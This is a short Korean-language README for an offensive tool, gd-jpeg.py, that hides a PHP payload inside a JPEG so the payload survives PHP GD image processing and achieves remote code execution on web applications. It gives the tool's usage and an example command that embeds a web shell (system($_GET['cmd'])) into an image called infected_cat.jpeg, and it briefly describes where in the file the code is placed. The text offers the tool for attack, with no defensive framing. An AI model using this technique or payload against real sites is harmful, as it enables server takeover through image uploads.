
PHP 페이로드를 JPEG 이미지에 주입하여 웹 애플리케이션 공격을 수행하고, GD 라이브러리 이미지 처리를 우회하여 원격 코드 실행을 달성합니다.
PHP 페이로드를 JPEG 이미지에 주입합니다. 이 게시물과 관련이 있습니다.
JPEG 이미지를 PHP의 GD 그래픽 라이브러리를 통해 처리하는 웹 애플리케이션이 있습니다.
이 스크립트는 지정된 JPEG 이미지에 PHP 코드를 주입합니다. 웹 애플리케이션이 이미지를 해석할 경우 페이로드를 실행합니다. 입력 JPEG이 압축되지 않았는지 확인하세요!
python3 gd-jpeg.py [JPEG] [PAYLOAD] [OUTPUT_JPEG]
예: python3 gd-jpeg.py cat.jpeg '<?php system($_GET["cmd"]);?>' infected_cat.jpeg
PHP 코드는 스캔 헤더 뒤의 널/가비지(갈색) 공간에 주입됩니다:
새로운 감염된 JPEG는 PHP의 GD 라이브러리를 통해 실행됩니다. PHP는 JPEG에 주입된 페이로드를 해석하여 실행합니다.